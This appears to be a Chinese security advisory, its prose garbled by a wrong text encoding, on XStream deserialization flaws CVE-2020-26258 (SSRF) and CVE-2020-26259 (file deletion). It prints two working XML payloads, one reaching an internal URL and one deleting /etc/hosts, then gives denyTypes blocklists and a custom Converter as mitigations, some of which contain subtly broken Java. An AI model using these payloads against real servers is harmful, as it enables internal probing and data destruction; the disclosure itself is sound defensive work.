¡¾·ì϶¹«¸æ¡¿XStream·´ÐòÁл¯·ì϶

°ä²¼¹¦·ò 2020-12-14

0x00 ·ì϶¸ÅÊö

²úÆ·Ãû³Æ

CVE ID

Àà ÐÍ

·ì϶µÈ¼¶

Ô¶³ÌÀûÓÃ

 XStream

CVE-2020-26258

SSRF

ÖÐΣ

ÊÇ

CVE-2020-26259

ËÁÒâÎļþɾ³ý

¸ßΣ

ÊÇ

0x01 ·ì϶ÏêÇé

 

image.png

2020Äê12ÔÂ13ÈÕ£¬XStream¹Ù·½°ä²¼°²È«²¼¸æ£¬¹«¿ªÁËXStreamÖеÄÁ½¸ö·´ÐòÁл¯·ì϶£¨CVE-2020-26258ºÍCVE-2020-26259£© ¡£ÏêÇéÈçÏ£º

XStream·þÎñÆ÷¶ËÒªÇóαÔì·ì϶£¨CVE-2020-26258£©

XStream·´ÐòÁл¯Ê±´¦ÖõÄÁ÷Ô̺¬ÓÃÓÚ³Áд´½¨ÒÔǰдÈëµÄ¶ÔÏóµÄÀàÐÍÐÅÏ¢£¬Æä»ùÓÚÕâЩÀàÐÍÐÅÏ¢´´½¨ÐµÄÊ·ý ¡£¹¥»÷ÕßÄܹ»Í¨¹ý°Ñ³ÖÒÑ´¦ÖõÄÊäÈëÁ÷²¢´úÌæ»ò²åÈë¶ÔÏ󣬴ӶøÌáÒé·þÎñÆ÷¶ËαÔìÒªÇó ¡£¹¥»÷Õß¿ÉÀûÓô˷ì϶´Óδ¹«¿ªµÄÄÚ²¿×ÊÔ´ÖÐÒªÇóÊý¾Ý ¡£

·ì϶¸´ÏÖ£º

´´½¨Ò»¸öµ¥Ò»µÄHashMap²¢Ê¹ÓÃXStream½«ÆäÐòÁл¯ÎªXML£¨Ò²¿ÉʹÓÃJSONµÈÆäËüÊÜÖ§³ÖµÄÌåʽ£© ¡£ÓÃÒÔÏ´úÂë´úÌæXML£¬¶øºóÓÃXStream·´ÐòÁл¯Ëü£º

<map>

  <entry>

    <jdk.nashorn.internal.objects.NativeString>

      <flags>0</flags>

      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>

        <dataHandler>

          <dataSource class='javax.activation.URLDataSource'>

            <url>http://localhost:8080/internal/:</url>

          </dataSource>

          <transferFlavors/>

        </dataHandler>

        <dataLen>0</dataLen>

      </value>

    </jdk.nashorn.internal.objects.NativeString>

    <string>test</string>

  </entry>

</map>

XStream xstream = new XStream();

xstream.fromXML(xml);

Ò»µ©·´ÐòÁл¯XML£¬¾Í»áÖ´ÐÐPayload²¢ÍøÂçÀ´×ÔURLµØλµÄÊý¾Ý ¡£

 

XStreamËÁÒâÎļþɾ³ý·ì϶£¨CVE-2020-26259£©

ÈôÊǹ¥»÷ÕßÕ¼ÓаѳÖÒÑ´¦ÖõÄÊäÈëÁ÷µÄÖ´Ç°¹ý³ÌµÄȨÏÞ£¬Ôò¹¥»÷ÕßÄܹ»Í¨¹ýÀûÓô˷ì϶ɾ³ýÖ÷»úÉϵÄËÁÒâÎļþ ¡£

·ì϶¸´ÏÖ£º

´´½¨Ò»¸öµ¥Ò»µÄHashMap²¢Ê¹ÓÃXStream½«ÆäÐòÁл¯ÎªXML£¨Ò²¿ÉʹÓÃJSONµÈÆäËüÊÜÖ§³ÖµÄÌåʽ£© ¡£ÓÃÒÔÏ´úÂë´úÌæXML£¬¶øºóÓÃXStream·´ÐòÁл¯Ëü£º

<map>

  <entry>

    <jdk.nashorn.internal.objects.NativeString>

      <flags>0</flags>

      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>

        <dataHandler>

          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>

            <contentType>text/plain</contentType>

            <is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'>

              <tempFile>/etc/hosts</tempFile>

            </is>

          </dataSource>

          <transferFlavors/>

        </dataHandler>

        <dataLen>0</dataLen>

      </value>

    </jdk.nashorn.internal.objects.NativeString>

    <string>test</string>

  </entry>

</map>

XStream xstream = new XStream();

xstream.fromXML(xml);

Ò»µ©·´ÐòÁл¯XML£¬¾Í»áÖ´ÐÐPayload²¢É¾³ýÒýÓÃÎļþ ¡£

 

Ó°ÏìÁìÓò£º

XStream : <=1.4.14

 

0x02 ´ëÖý¨Òé

Ä¿Ç°XStreamÒѾ­½¨¸´ÁËÓйطì϶£¬½¨ÒéÉý¼¶ÖÁ1.4.15°æ±¾ ¡£

ÏÂÔØÁ´½Ó£º

https://x-stream.github.io/changes.html#1.4.15


XStream 1.4.15ÒÔÏ°汾¿ÉʹÓÃÈçϽâ¾ö²½Ö裺

XStream 1.4.14ÐèÔÚXStreamµÄ×°ÖôúÂëÖÐÔö³¤2ÐУº

xstream.denyTypes(new String[]{ "jdk.nashorn.internal.objects.NativeString" });

xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });

 

XStream 1.4.13ÐèÔÚXStreamµÄ×°ÖôúÂëÖÐÔö³¤3ÐУº

xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });

xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });

xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });

 

XStream 1.4.7-1.4.12ÈôÊǵ«Ô¸Ê¹ÓÃXStreamµÄºÚÃûµ¥£¬±ØÒª»Ø¾øÒÔÏÂÀàÐÍ£º

xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });

xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, "jdk.nashorn.internal.objects.NativeString", java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });

xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..*", ".*\\.ReadAllStream\\$FileStream" });

 

XStream 1.4.6¼°¸üµÍ°æ±¾Äܹ»Í¨¹ý×¢²á×Ô¼ºµÄConverterÀ´Ô¤·ÀJavaÔËÐÐʱµÄ¹Ø¼üÀàÐͱ»·´ÐòÁл¯ ¡£

xstream.registerConverter(new Converter() {

  public boolean canConvert(Class type) {

    return type != null && (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class

        || type.getName().equals("javax.imageio.ImageIO$ContainsFilter") || type.getName().equals("jdk.nashorn.internal.objects.NativeString")

        || type == java.lang.Void.class || void.class || Proxy.isProxy(type))

        || type.getName().startsWith("javax.crypto.") || type.getName().endsWith("$LazyIterator") || type.getName().endsWith(".ReadAllStream$FileStream"));

  }

 

  public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {

    throw new ConversionException("Unsupported type due to security reasons.");

  }

 

  public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {

    throw new ConversionException("Unsupported type due to security reasons.");

  }

}, XStream.PRIORITY_LOW);

 

0x03 ²Î¿¼Á´½Ó

http://x-stream.github.io/CVE-2020-26259.html

https://github.com/x-stream/xstream/security/advisories/GHSA-4cch-wxpw-8p28

https://github.com/x-stream/xstream/security/advisories/GHSA-jfvx-7wrx-43fh

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26259


0x04 ¹¦·òÏß

2020-12-13  XStream°ä²¼°²È«²¼¸æ

2020-12-14  VSRC°ä²¼°²È«¹«¸æ

 

0x05 ¸½Â¼

 

CVSSÆÀ·Ö³ß¶È¹ÙÍø£ºhttp://www.first.org/cvss/

image.png